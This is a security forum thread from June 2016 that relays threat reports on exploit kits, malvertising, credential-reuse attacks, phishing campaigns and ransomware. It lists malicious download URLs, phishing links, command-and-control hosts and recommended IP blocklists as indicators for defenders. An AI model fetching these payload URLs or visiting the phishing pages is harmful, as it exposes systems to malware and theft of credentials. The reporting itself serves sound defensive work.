Angler EK evades EMET; Malvertising - DoubleClick Ad Fraud; Password re-use...
FYI...
Angler EK now evades EMET on Win7 ...
- https://www.fireeye.com/blog/threat-...loit_kite.html
June 06, 2016 - "We recently encountered some exploits from Angler Exploit Kit (EK) that are completely evading Microsoft’s Enhanced Mitigation Experience Toolkit (EMET). This is something we are seeing for the first time in the wild, and we only observed it affecting systems running Windows 7. Angler EK uses complex multi-layered code obfuscation and leverages multiple exploits...
Conclusion: The level of sophistication in exploits kit has increased significantly throughout the years. Where obfuscation and new zero days were once the only additions in the development cycle, evasive code has now been observed being embedded into the framework and shellcode.
Remediation guidance: Although there are no quick solutions for the DEP, EAF, and EAF+ evasion techniques, organizations can mitigate this threat through a robust vulnerability management program for end user systems, which includes the installation of security updates for third party software. Applications such as Adobe Flash, web browsers, and Oracle Java should be patched routinely, prioritizing critical patches, or removed if possible. Because the web browser plays an important role in the infection process, disabling browser plugins for Flash or Silverlight may also reduce the browser attack surface."
- http://arstechnica.com/security/2016...icrosoft-emet/
Jun 6, 2016 - "... there's nothing stopping Angler from using the EMET evasions to install other malicious applications..."
___
Malvertising - DoubleClick Ad Fraud
- https://blog.malwarebytes.org/cyberc...lick-ad-fraud/
June 6, 2016 - "Malvertising isn’t only used to infect users via drive-by downloads or to deceitfully push fake-software-updates. A campaign currently going on via the -TrafficHolder- adult ad platform leverages the promise of raunchy videos to lure people into ad fraud. The trick is simple and yet effective. While browsing, users are automatically redirected to what appears to be YouTube for adult content. The page looks completely normal, except for the fact that it is a giant image slapped across an actual ‘normal’ WordPress website. To the naked eye the large JPEG or GIF looks legit, and curious visitors may me tempted to push the Play button to watch the saucy movie. Rather than playing any content, this click is used to launch a real and paid advert via Google’s DoubleClick. This technique referred to as ‘clickjacking’ is very popular and can take different forms while the end goal remains to generate legitimate-looking clicks on adverts:
> https://blog.malwarebytes.org/wp-con.../06/Flow__.png
The crooks are using hundreds of what appear to be -bogus- (insurance, loans and other scams) WordPress sites to carry out this fraudulent scheme. A simple layer is added on top of the page to give this optical illusion. JavaScript code is able to track mouse movements and knows if the user has actually clicked on the advert... The fake adult image (which covers the whole page) is dynamically generated on the fly and a new one is retrieved randomly from a remote server (5.39.99.215)... that image will disappear after a few seconds of inactivity to reveal the actual underlying WordPress site. The majority of the sites we found were highly suspicious and most likely used for hosting various other spammy content. When users click to play the -bogus- video, their action triggers the ad fraud component of this scam by abusing Google’s DoubleClick... In this particular malvertising instance, users are not put at risk with malicious code, they are simply being duped so that the crooks behind this can generate ad money for each click. However, we have also observed redirections to exploit kits via the same ad platform (TrafficHolder) so you should be extra vigilant and use a proactive line of defence such as exploit protection to avoid getting infected. We have reported this ad fraud to Google and will keep monitoring the situation as one can expect those rogue actors to come up with a different plan to monetize low quality traffic."
5.39.99.215: https://www.virustotal.com/en/ip-add...5/information/
___
Password Re-user? Get Ready to Get Busy
- http://krebsonsecurity.com/2016/06/p...t-to-get-busy/
June 6, 2016 - "In the wake of megabreaches at some of the Internet’s most-recognized destinations, don’t be surprised if you receive password-reset-requests from numerous companies that didn’t experience a breach:
Some big name companies — including Facebook and Netflix — are in the habit of combing through huge data leak troves for credentials that match those of their customers and then forcing a password reset for those users. Netflix .com, for example, sent out a notification late last week to users who made the mistake of re-using their Netflix password at Linkedin, Tumblr or MySpace. All of three of those breaches are years old, but the scope of the intrusions (more than a half -billion- usernames and passwords leaked in total) only became apparent recently when the credentials were posted online at various sites and services:
>> http://krebsonsecurity.com/wp-conten...e-580x1031.png
... Netflix is taking this step because it knows from experience that -cybercriminals-will- be using the credentials leaked from Tumblr, MySpace and LinkedIn to see if they work on a variety of third-party sites (including Netflix)... Facebook* also has been known to mine-data-leaked in major external password breaches for any signs that users are re-using their passwords at the hacked entity."
* http://krebsonsecurity.com/2013/11/f...-adobe-breach/
:fear::fear: :mad:
'Mega' breach - password check...
FYI...
LinkedIn breach data Used for Malicious E-Mails
- https://isc.sans.edu/diary.html?storyid=21139
2016-06-07 - "Yesterday, the German federal CERT (CERT-BUND) warned of phishing e-mails that are more plausible by using data that appears to originate from the recently leaked LinkedIn data set. The e-mail address the recipient by full name and job title. Typically, the attachments claim to contain an invoice. We have since received a couple of users who reported receiving e-mails that match the pattern. For example:
> https://isc.sans.edu/diaryimages/ima...44_56%20AM.png
The e-mails arrive in different languages. They address the recipient by full name, job title and company name, to make the e-mail more plausible. This is similar to the way social media was used in the past to create more convincing phishing e-mails. For example, see this old article from 3 years ago* about how Facebook data is used in this way. With the LinkedIn leak, data has become available that wasn't reachable by simple screen scrapers (or API users) in the past."
* https://isc.sans.edu/diary.html?storyid=15265
2013-02-25
___
TeamViewer confirms number of abused user accounts is “significant”
- http://arstechnica.com/security/2016...-account-hack/
Jun 5, 2016 - "It was a tough week for TeamViewer, a service that allows computer professionals and consumers to log into their computers from remote locations. For a little more than a month, a growing number of users have reported their accounts were accessed by criminals who used their highly privileged position to drain PayPal and bank accounts. Critics have speculated TeamViewer itself has fallen victim to a breach that's making the mass hacks possible. On Sunday, TeamViewer spokesman Axel Schmidt acknowledged to Ars that the number of takeovers was 'significant', but he continued to maintain that the compromises are the result of user passwords that were compromised through a cluster of recently exposed megabreaches involving more than 642 million passwords belonging to users of LinkedIn, MySpace, and other services..."
- http://www.zdnet.com/article/teamvie...k-significant/
"... If you think you may have been involved in the breach, check HaveIbeenPwned* and change your passwords as soon as possible..."
* https://haveibeenpwned.com/
:fear::fear: :mad:
Fake 'résumé' SPAM, Tax refund – Phish
FYI...
Fake 'résumé' SPAM - drops Cerber ransomware
- http://blog.dynamoo.com/2016/06/malw...sume-spam.html
8 June 2016 - "This -fake- résumé spam leads to malware:
From: Dora Bain
Date: 7 June 2016 at 03:37
Subject: Good morning
What's Up?
I visited your website today..
I'm currently looking for work either full time or as a intern to get experience in the field.
Please look over my CV and let me know what you think.
With gratitude,
Dora Bain
In the sample I saw, the attached file was named Dora-Resume.doc and had a VirusTotal detection rate of 11/56*. The Malwr report** and Hybrid Analysis*** show that a -script- executes that tries to make a political statement along the way.. This downloads a file from 80.82.64.198 /subid1.exe which is then saved as %APPDATA%\us_drones_kills_civilians.exe which VirusTotal gives a detection rate of 20/56[4] and seems to give an overall diagnosis as being Cerber ransomware. The IP address of 80.82.64.198 is allocated to an apparent Seychelles shell company called Quasi Networks Ltd (which is probably Russian). There seems to be little if anything of value in 80.82.64.0/24 which could be a good candidate to block. Incidentally, the IP hosts best-booters .com which is likely to be a DDOS-for-hire site. According to the VT report[5] the malware scans for a response on port 6892 on the IP addresses 85.93.0.0 through to 85.93.63.255. However, this Hybrid Analysis[6] indicates that the only server to respond is on 85.93.0.124 (GuardoMicro SRL, Romania) which is part of the notoriously bad 85.93.0.0/24 which is a good thing to block. That report also shows traffic to ipinfo .io which is a legitimate "what is my IP" service. While not malicious in its own right, it does make a potentially good indicator of compromise.
Recommended blocklist:
80.82.64.0/24
85.93.0.0/24 "
* https://virustotal.com/en/file/3b825...is/1465377335/
** https://malwr.com/analysis/MjAwOWJjM...M0ODJlYWI5N2E/
*** https://www.hybrid-analysis.com/samp...ironmentId=100
4] https://virustotal.com/en/file/87d80...is/1465377604/
TCP connections
52.29.28.100: https://www.virustotal.com/en/ip-add...0/information/
5] https://virustotal.com/en/file/87d80...is/1465377604/
TCP connections
52.29.28.100
6] https://www.hybrid-analysis.com/samp...ironmentId=100
___
Automated tax refund notification – Phish
- https://myonlinesecurity.co.uk/autom...tion-phishing/
8 June 2016 - "One of the frequent subjects in a phishing attempt is 'Tax returns' or 'tax refunds', where especially in UK, you need to submit your Tax Return online. The phishers have caught on to the fact that in UK -all- government services are now dealt with by a common gateway and you need to register for a Government Gateway account. This one wants your personal details and your credit card and bank details...
Screenshot: https://myonlinesecurity.co.uk/wp-co...h-1024x428.png
If you follow the link: http ://americasfootcenter .com/automated.refund.application.online.start.account.for.special.refund/1255bbc5b01e0284db618c7bc75d643c/registration.php?ip=[redacted]
.. you see a webpage asking for name, address, birth date etc. looking like:
> https://myonlinesecurity.co.uk/wp-co...h-1024x560.png
.. Then you are asked for your address and mobile number:
> https://myonlinesecurity.co.uk/wp-co...2-1024x461.png
.. Next credit card details:
> https://myonlinesecurity.co.uk/wp-co...ay_phish_3.png
.. Next is Bank details:
> https://myonlinesecurity.co.uk/wp-co...ay_phish_4.png
.. Next is a 'done' page, where you are told that it will take 5 to 7 days to deal with and give you the refund. and you are then automatically forwarded to the genuine gov .uk start page:
> https://myonlinesecurity.co.uk/wp-co...ay_phish_5.png
All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... whether it is a straight forward attempt, like this one, to -steal- your personal, bank, credit card or email and social networking log in details..."
americasfootcenter .com: 50.87.146.116: https://www.virustotal.com/en/ip-add...6/information/
>> https://www.virustotal.com/en/url/d4...c4cc/analysis/
>> https://www.virustotal.com/en/url/34...3d87/analysis/
:fear::fear: :mad:
Fake 'Fedex' SPAM, Macro-Based Malware, 'Google Dorking'
FYI...
'Chat' for Ransom Attempts
- http://blog.trendmicro.com/trendlabs...nsom-attempts/
June 9, 2016 - "... The innovation brought forth by some new JIGSAW variants? Instead of using dark web sites, it communicates to the user via… live chat. The threats displayed by these new variants (detected as Ransom_JIGSAW.H) are similar to those shown by the earlier JIGSAW variants...
JIGSAW ransom note: https://blog.trendmicro.com/trendlab...06/jigsaw1.png
One big difference should be apparent: there is now a link which appears to go to a live chat session:
> https://blog.trendmicro.com/trendlab...06/jigsaw3.png
The attackers actually have people standing by to answer questions... The cybercriminals behind this JIGSAW variant didn’t build their own chat client; instead they used onWebChat, a publicly available chat platform. A script that calls the onWebChat client is embedded in the website. The connection to onWebchat’s servers is protected with SSL/TLS, making packet capture and interception more difficult in the absence of a proxy intercepting encrypted traffic. We have reached out to onWebChat and informed them of this issue.
Interestingly, the cybercriminal on the other end of the chat conversation doesn’t actually know when the user was infected. The “timer” is only based on a cookie set on the affected machine – if this cookie is deleted, the countdown resets to 24 hours. As a result, the cybercriminals are actually reliant on the user’s honesty when it comes to finding out how much ransom should be paid! There are some perverse incentives at work for cybercriminals to decide to focus on their “customers” (i.e., victims) in this way. Whatever those incentives may be, the victims of this crime now have an immediate, human voice to go to when their files are encrypted. This may predispose them to pay up if they are victimized – something we do not encourage. One more thing to note. While looking into the site hosting this instant chat, we found a -second- piece of malware that used the same site. This one, however, was “only” lockscreen malware, which can be bypassed and removed by booting into safe mode... This kind of “customer-centric” approach to ransomware is unusual, although not entirely unprecedented... Users can likewise take advantage of our free tools such as the Trend Micro Lock Screen Ransomware Tool*, which is designed to detect and remove screen-locker ransomware; as well as Trend Micro Crypto-Ransomware File Decryptor Tool**, which can decrypt certain variants of crypto-ransomware without paying the ransom or the use of the decryption key..."
* https://esupport.trendmicro.com/en-u...t/1105975.aspx
** https://esupport.trendmicro.com/solu...S/1114221.aspx
___
Fake 'Fedex' SPAM - leads to Andromeda
- http://blog.dynamoo.com/2016/06/malw...ent-fedex.html
8 June 2016 23:21 - "This fake FedEx (or FeDex?) spam has a malicious attachment:
From: Secure-FeDex
Date: 8 June 2016 at 18:17
Subject: David Bernard agent Fedex
Deаr [redacted] ,
We tried tо delivеr уour item on June 08th, 2016, 10:45 АM.
The delivеry attempt failеd because thе аddress was business сlоsed оr nobodу сould sign fоr it.
Тo piсk up the package, please, рrint the receipt that is аttаchеd to this еmаil and visit FеdEx
office indicated in the invoice. If the pасkagе is nоt piсkеd up within 24 hоurs, it will bе returnеd to thе shipper.
Receipt Number: 98402839289
Eхpесted Delivеrу Dаte: June 08th, 2016
Class: Intеrnаtional Paсkаge Sеrviсe
Servicе(s): Delivеrу Cоnfirmation
Status: Notifiсatiоn sent
Thank you for choosing our service ...
In this case there was an attachment FedEx_track_98404283928.zip which unzipped into a folder FedEx_track_98404283928 containing in turn a -malicious-script- FedEx_track_98404283928.js which (according to Malwr*) attempts to download a binary from one of the following locations:
www .brusasport .com/Brusa/vario/direct/teamviiverupdate2918372.exe
www .microsoft .com/Brusa/vario/direct/teamviiverupdate2918372.exe
www .mega .net/Brusa/vario/direct/teamviiverupdate2918372.exe
www .google .com/Brusa/vario/direct/teamviiverupdate2918372.exe
www .yahoo .com/Brusa/vario/direct/teamviiverupdate2918372.exe
Only the first one is a valid download location, the rest are a smokescreen. The dropped binary has a detection rate of 5/56** but automated analysis [1] [2] [3] is inconclusive. However those reports do seem to indicate attempted network traffic to:
secure .adnxs.metalsystems .it
upfd .pilenga .co.uk
These two subdomains appears to have been hijacked from unrelated Register.IT customers and are hosted on a questionable-looking customer of OVH Italy on 188.165.157.176 ... Other -hijacked- subdomains on the same IP are:
tgr .tecnoagenzia .eu
bmp.pilenga .co.uk
maps.pilenga .co.uk
sundication .twitter.luigilatruffa .com
tit.pilenga .net
trw.pilenga .net
ocsp.pilenga .net
plda.pilenga .net
maps.pilenga .mobi
plda.pilenga .mobi
This Tweet[4] from @pancak3lullz indicates that this IP is associated with Anrdomeda rather than the usual recent patterns of Locky or Dridex (which has.. err.. dried up recently). It appears to have been a malicious IP for more than a month[5]. Of interest is that almost every part of this chain (including the spam sending IP of 31.27.229.22) is in Italy. As with a great deal of recent spam, this is delivered via a .js script in a ZIP file. If you can configure your mail filters to reject such things then you will be a whole lot safer.
Recommended blocklist:
188.165.157.176/30 "
* https://malwr.com/analysis/ZDViYmNjM...I0MGIxODc3OTU/
** https://www.virustotal.com/en/file/0...is/1465421690/
1] https://malwr.com/analysis/OGMxMzE5N...MxYTEyZmM0YmQ/
2] https://sandbox.deepviz.com/report/h...1f8fa82586980/
3] https://www.hybrid-analysis.com/samp...ironmentId=100
4] https://twitter.com/pancak3lullz/sta...91468238983168
5] https://malwr.com/analysis/N2I4YWZlZ...hlOGJlODE3MGI/
___
Increased Risks from Macro-Based Malware
- https://www.us-cert.gov/ncas/current...-Based-Malware
June 09, 2016 - "Microsoft Office applications use macros to automate routine tasks. However, macros can contain malicious code that can be used to exploit vulnerable systems. Recently, there has been a resurgence of malware that is spread via macros. Individuals and organizations should proactively secure systems against macro-based malware. Users and administrators are encouraged to review CERT's article (link* is external) on the resurgence of macro exploitation and apply recommendations outlined in CERT Australia's report** on macro security."
* https://insights.sei.cmu.edu/cert/20...ve-macros.html
June 8, 2016
** http://www.asd.gov.au/publications/p...o_Security.pdf
___
Google Dorking ...
Google Dorking sounds harmless, but it can take your company down. Here's what you need to know to avoid being hacked
- http://www.darkreading.com/cloud/goo...a/d-id/1325842
6/9/2016
> http://www.darkreading.com/cloud-security.asp
- http://arstechnica.com/security/2016...esearch-finds/
Jun 9, 2016 - "About 11 percent of shared cloud folders contain nasty surprises, according to recent research..."
___
Rotten Apples: Apple-like Malicious Phishing Domains
- https://www.fireeye.com/blog/threat-...les_apple.html
June 07, 2016 - "At FireEye Labs we have an automated system designed to proactively detect newly registered malicious domains. This system observed some -phishing- domains registered in the first quarter of 2016 that were designed to appear as legitimate Apple domains. These -phony-Apple-domains- were involved in phishing attacks against Apple iCloud users in China and UK. In the past we have observed several phishing domains targeting Apple, Google and Yahoo users; however, these campaigns are unique as they are serving the same malicious phishing content from different domains to target Apple users. Since January 2016 we have observed several phishing campaigns targeting the Apple IDs and passwords of Apple users. Apple provides all of its customers with an Apple ID, a centralized personal account that gives access to iCloud and other Apple features and services such as the iTunes Store and App Store. Users will provide their Apple ID to sign in to iCloud[.]com, and use the same Apple ID to set up iCloud on their iPhone, iPad, iPod Touch, Mac, or Windows computer..."
(More detail at the fireeye URL above.)
:fear::fear: :mad:
Malvertising: How to beat bad ads
FYI...
Malvertising: How to beat bad ads
- https://blog.malwarebytes.org/101/20...-beat-bad-ads/
June 13, 2016 - "... Malvertising, or malicious advertising, is the use of online advertising to distribute malware with little to no user interaction required. You could be researching business trends on a site like NYTimes .com and, without ever having clicked on an ad, be in trouble. A tiny piece of code hidden deep in the ad [re]directs your computer to criminal servers. These servers catalog details about your computer and its location, and then select the 'right' malware for you... the problem’s only getting worse. In 2015, Google disabled more than 780 million bad ads, a nearly 50% increase over 2014. According to RiskIQ*, in just the first half of 2015, malvertising increased 260% compared against all of 2014... infected ads often use an iframe, or invisible webpage element, to do its work. You don’t even need to click on the ad to activate it — just visit the webpage hosting the ad. (Hence the term 'drive-by download'). The iframe redirects to an exploit landing page, and malicious code attacks your system from the landing page via exploit. The exploit kit delivers malware — and 70 percent of the time, it’s ransomware..."
(More detail at the malwarebytes URL above.)
* https://www.riskiq.com/blog/riskiq-l...g/malvertising
:fear::fear: :mad:
JS email attachments, Advanced phishing tactics
FYI...
Do NOT run JS email attachments ...
- http://www.infoworld.com/article/308...ansomware.html
Jun 14, 2016 - "Attackers are infecting computers with a new ransomware program called RAA that's written entirely in -JavaScript- and locks users' files by using strong encryption. Most malware programs for Windows are written in compiled programming languages like C or C++ and take the form of portable executable files such as .exe or .dll. Others use command-line scripting such as Windows batch or PowerShell. It's rare to see client-side malware written in web-based languages such as JavaScript, which are primarily intended to be interpreted by browsers. Yet the Windows Script Host, a service built into Windows, can natively execute .js and other scripting files out of the box. Attackers have taken to this technique in recent months, with Microsoft warning about a spike in malicious email attachments containing JavaScript files back in April. Last month, security researchers from ESET warned of a wave of spam that distributes the Locky ransomware through .js attachments. In both of those cases the JavaScript files were used as malware downloaders - scripts designed to download and install a traditional malware program. In the case of RAA, however, the whole ransomware is written in JavaScript. According to experts from tech support forum BleepingComputer*, RAA relies on CryptoJS, a legitimate JavaScript library, to implement its encryption routine. The implementation appears to be solid, using the AES-256 encryption algorithm..."
* http://www.bleepingcomputer.com/news...ng-javascript/
___
Advanced phishing tactics used to steal PayPal credentials
- https://blog.malwarebytes.org/cyberc...l-credentials/
June 14, 2016 - "Phishers are back to using an old tactic in a -new- fashion to get hold of their victims’ credentials. One of the first lessons you will learn during anti-phishing training is to hover over the links in a mail to see if they point to the site where you would expect them to point. Although good advice, this is NOT a guarantee that you are going to be safe. Always visit sites directly, never follow the URLs presented to you in emails-or-attachments... As reported by UK malware researcher @dvk01uk*, the phishers are using -Javascript- to send the user to the promised PayPal site while the login credentials are being-sent-to-an-entirely-different domain:
> https://twitter.com/dvk01uk/status/742233789531852800
'The javascript runs as soon as the page (HTML attachment) is loaded and -intercepts- all posts to PayPal .com and -diverts- them to the actual phishing page to accept all your details, if you are unwise enough to fall for this trick.'
In this case, the phish was pointing to PayPal and the phishing page is www[dot]egypt-trips[dot]co which appears to be an unused WordPress site. (We have informed the registrant of the phish, so we hope they will take appropriate measures)... The original blogpost about this particular phish, including screenshots and code snippets, can be found here:
> https://myonlinesecurity.co.uk/very-...ishing-attack/
egypt-trips[dot]co: 160.153.162.9: https://www.virustotal.com/en/ip-add...9/information/
>> https://www.virustotal.com/en/url/6e...189e/analysis/
>> https://www.virustotal.com/en/url/91...59af/analysis/
>> https://www.virustotal.com/en/url/77...97d0/analysis/
:fear::fear: :mad:
Locky/Dridex trying to come back
FYI...
Locky/Dridex trying to come back
- https://myonlinesecurity.co.uk/locky...-to-come-back/
16 June 2016 - "Since yesterday 15 June 2016, we have been hearing about a slow but steady trickle of Locky ransomware / Dridex banking Trojan -JavaScript- downloaders inside zip file attachments. The first one I received on my mail server were at about 4 am UTC today. I am pretty sure these are only test mails, because the JavaScript is so well detected and the site linked to inside the JavaScript is a site that was seen several weeks ago & is currently down, although appears to have still been active yesterday at some stage. The emails that I am currently seeing this morning are very basic and simple, but they do always catch the unwary or curious user. They are all pretending to come from various yahoo email addresses with a subject of Photos and a completely blank / -empty- email body. One of the emails looks like:
From: Mitchell <Mitchell842@ yahoo .com>
Date: Thu 16/06/2016 05:55
Subject: Photos
Attachment: Photo.zip
Body content: Blank/Empty
All copies I have seen so far today contain exactly the same docment_380578378.js inside the photo.zip
(VirusTotal Detections 35/55*). Payload Security** shows the download was from shivshanti .in/n78f7gbniu
(VirusTotal detections 46/55***) which shows the same file from 2 weeks ago before the Necurs botnet went down and Locky was unable to spread with its previous intensity. It looks like our short holiday from the onslaught of email delivered malware has come to an end and we should all be prepared for a massive attack over the next few days."
* https://www.virustotal.com/en/file/5...is/1466045706/
** https://www.hybrid-analysis.com/samp...ironmentId=100
Contacted Hosts
43.242.215.197
85.17.19.102
195.154.69.90
93.170.123.60
95.211.174.92
*** https://www.virustotal.com/en/file/0...is/1466045706/
shivshanti .in: 43.242.215.197: https://www.virustotal.com/en/ip-add...7/information/
>> https://www.virustotal.com/en/url/71...c29b/analysis/
:fear::fear: :mad:
'Credit/Debit Card temporarily disabled' – PHISH
FYI...
'Credit/Debit Card temporarily disabled' – PHISH
- https://myonlinesecurity.co.uk/we-ha...card-phishing/
18 June 2016 - "There are a few major common subjects in a phishing attempt. Lots of them are either PayPal, your Bank or your Credit Card, with a message saying some thing like :
Urgent: Your card has been stopped !
There have been unauthorised or suspicious attempts to log in to your account, please verify
Your account has exceeded its limit and needs to be verified
Your account will be suspended !
You have received a secure message from < your bank>
We are unable to verify your account information
Update Personal Information
Urgent Account Review Notification
We recently noticed one or more attempts to log in to your PayPal account from a foreign IP address
Confirmation of Order
We have temporarily disabled your Credit/Debit Card
The original email looks like this. It will NEVER be a genuine email from PayPal, your Bank or credit card so don’t ever follow the links or fill in the html (webpage) form that comes attached to the email. Note the bad spelling of norepply and the VLSA .COM that is supposed to say visa .com (using lookalike domains is a common trick that phishers use. The English Grammar in the email is just not quite right, so suggesting that this was created by somebody that doesn’t have English as their primary language...
Screenshot: https://myonlinesecurity.co.uk/wp-co...d-1024x700.png
This particular phishing campaign starts with an email-with-a-link. The link in this case goes to http ://adistancia.favaloro .edu.ar/themes/landingPage.html where you are invited to enter the case ID from the email:
> https://myonlinesecurity.co.uk/wp-co...1-1024x811.png
Without the ID number, you just get an error message:
> https://myonlinesecurity.co.uk/wp-co...a_phish_1a.png
If you enter the correct ID you get:
> https://myonlinesecurity.co.uk/wp-co...2-1024x760.png
... Which is a typical phishing page that looks very similar to a genuine visa page, if you don’t look carefully at the URL in the browser address bar. This one wants your personal details, Your SSN (US Social Security Number), your credit card and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details..."
adistancia.favaloro .edu.ar: 190.12.101.227: https://www.virustotal.com/en/ip-add...7/information/
>> https://www.virustotal.com/en/url/15...1c78/analysis/
:fear::fear: :mad:
'Apple ID' Phish, Fake 'Swift Pmnt Notice', Dropbox, 'VAT Return'SPAM, JS ransomware
FYI...
Fake 'Apple ID' SPAM / Phish
- https://myonlinesecurity.co.uk/your-...sons-phishing/
20 June 2016 - "... Apple phishing attempt... 300 copies in the last couple of hours. The subject is one we see regularly 'Your Apple ID has been disabled for security reasons!'... several copies where all the body content is in the subject line & nothing in the body:
From: Apple <apples@ applestuffs .com>
Date: Mon 20/06/2016 11:12
Subject: Your Apple ID has been disabled for security reasons!
Attachment: None
Screenshot: https://myonlinesecurity.co.uk/wp-co...s-1024x693.png
The link behind the verify now goes to http ://interwurlitzer .com/write/it.html which -redirects- to
http ://flyingstart .ca/science/disabled/apple/index.php neither of which look even vaguely like any Apple site so shouldn’t fool anybody... some careless users will click through, not look at the URL in the browser and give all their details:
> https://myonlinesecurity.co.uk/wp-co...h-1024x596.png
If you are careless enough or unwise enough to enter your apple ID & password, you get to this page where they ask for all the personal & financial information:
> https://myonlinesecurity.co.uk/wp-co...b-754x1024.png
... Watch for any site that invites you to enter -ANY- personal or financial information. It might be an email that says 'you have won a prize' or 'sign up to this website for discounts, prizes and special offers'..."
interwurlitzer .com: 87.229.45.133: https://www.virustotal.com/en/ip-add...3/information/
>> https://www.virustotal.com/en/url/25...7f5b/analysis/
flyingstart .ca: 67.212.91.221: https://www.virustotal.com/en/ip-add...1/information/
>> https://www.virustotal.com/en/url/1d...da44/analysis/
___
Fake 'Swift Payment Notice' SPAM - malicious link
- https://isc.sans.edu/diary.html?storyid=21177
2016-06-20 - "Some of our readers reported spam messages related to the recent Swift case. With all the buzz around this story, it looks legitimate to see more and more attackers using this scenario to entice victims to open malicious files. The mail subject is "Swift Payment Notice, pls check" and contains an image of a receipt embedded in an HTML page... The HTML-link-points to a malicious PE file called "SWIFT COPY.exe" (MD5: 6ccabab506ad6a8f13c6d84b955c3037). The file is downloaded from a compromized Wordpress instance and seems to contain a keylogger. Data are sent to onyeoma5050s .ddns .net. The host resolved to 95.140.125.110 but it is not valid anymore (take down already completed?). Even if PE files should be blocked by most web proxies, the current VT score remains low (6/55*) which still makes it dangerous."
* https://www.virustotal.com/en/file/3...d794/analysis/
___
Fake Dropbox SPAM - js malware
- https://myonlinesecurity.co.uk/andre...u-scan001-zip/
20 June 2016 - "... an email with the subject of 'Andrew Lumley sent you Scan001.zip' pretending to come from Andrew Lumley via Dropbox <no-reply@ dropbox .com> with a link to a zip file containing 3 identical JavaScript files...
Screenshot: https://myonlinesecurity.co.uk/wp-co...p-1024x715.png
20 June 2016: scan001.zip: Extracts to: scan0001.js - Current Virus total detections 3/56*
.. Payload security** shows a download from 69.20.55.160 :80/Scripts/rex7.exe (VirusTotal 3/56[3])
(Payload Security[4])... This is another one of the files that unless you have “show known file extensions enabled“, can easily be mistaken for a genuine DOC/PDF/JPG or other common file instead of the .EXE/.JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/c...is/1466428353/
** https://www.reverse.it/sample/ccf1eb...ironmentId=100
Contacted Hosts
69.20.55.160
3] https://www.virustotal.com/en/file/0...is/1466428353/
4] https://www.reverse.it/sample/06397e...ironmentId=100
69.20.55.160: https://www.virustotal.com/en/ip-add...0/information/
>> https://www.virustotal.com/en/url/4e...b8f5/analysis/
___
Fake 'VAT Return' SPAM - macro malware
- https://myonlinesecurity.co.uk/vat-r...ds-ransomware/
20 June 2016 - "... an email with the subject of 'VAT Return' pretending to come from noreply@ hmrc .gov.uk with a malicious word doc attachment is another one from the current bot runs...
Screenshot: https://myonlinesecurity.co.uk/wp-co...n-1024x450.png
20 June 2016: vat030116-0530161.doc - Current Virus total detections 4/55*.
.. Payload Security[2] shows it downloads http ://xbdev .net/hmrc.zip (VirusTotal 4/56**)... it is Sharik which is a password stealer... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/a...is/1466424536/
2] https://www.reverse.it/sample/a7ac9f...ironmentId=100
** https://www.virustotal.com/en/file/2...is/1466429914/
xbdev .net: 208.97.176.242: https://www.virustotal.com/en/ip-add...2/information/
>> https://www.virustotal.com/en/url/21...86f8/analysis/
___
Fake 'PO' SPAM - Java malware attachment
- https://myonlinesecurity.co.uk/order...-java-malware/
20 June 2016 - "An email pretending to be an order for scarves with the subject of 'Re: PO' pretending to come from Martina O’Shea <Martinashea@ maf .ae> with a Java jar attachment... One of the emails looks like:
From: Martina O’Shea <Martinashea@ maf .ae>
Date: Mon 20/06/2016 11:46
Subject: Re: PO
Attachment: 23456445.jar
Good morning
Please find attached an order for some scarves
for delivery to our warehouse in Churchfield,
Cork.
Please confirm all scarves are available and a
delivery date for same.
Many thanks.
Kind regards,
Manager – Buying Administration Dept
The Kilkenny Group ...
20 June 2016: 23456445.jar - Current Virus total detections 15/56*
I don’t have Java installed and none of the online analysers ever tell us anything really useful about java files but MALWR** does show several files being dropped or downloaded... This is another one of the files that unless you have “show known file extensions enabled“, can easily be mistaken for a genuine DOC/PDF/JPG or other common file instead of the .EXE/.JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/6...is/1466389366/
** https://malwr.com/analysis/NjQ0ZmUwM...RlYWYwZjU4MzI/
___
JavaScript ransomware
- http://www.trendmicro.com.au/vinfo/a...fect-computers
June 16, 2016 - "... ransomware called RAA is composed entirely of JavaScript and has been spreading via email attachments that pretend to be doc files with names like mgJaXnwanxlS_doc_.js. Once the JavaScript is opened, it will encrypt files in the affected machine and demand a ransom amounting roughly to US$250 to get the files. Reportedly, RAA infections display the ransom note in Russian, however, it’s only a matter of time until it’s distributed more widely and localized for other languages. Additionally, the ransomware also infects the victim’s computer by installing Pony, a well-known password-stealing malware embedded in the JavaScript file. This malware can collect browser passwords and other user information from an infected machine, and is usually used by hackers to gather critical information on infected systems. Pony is similar with banking trojans, but its behavior was not manifested in RAA. The RAA ransomware is considered unique because it’s rare to see client-side malware written in web-based languages like JavaScript, which are primarily designed to be interpreted by browsers. Microsoft has previously warned* about a spike in malicious email attachments containing JavaScript files in April 2016. The following month, security researchers alerted about spam emails that delivers and distributes the Locky ransomware via .js attachments. Both Locky and RAA uses JavaScript files as malware downloaders — designed to download and install a traditional malware program. With RAA however, the entire ransomware is written in JavaScript..."
* https://blogs.technet.microsoft.com/...to-avoid-them/
"... The spam email contains a .zip or .rar file attachment which carries a malicious JavaScript..."
> http://www.bleepingcomputer.com/news...ng-javascript/
:fear::fear: :mad: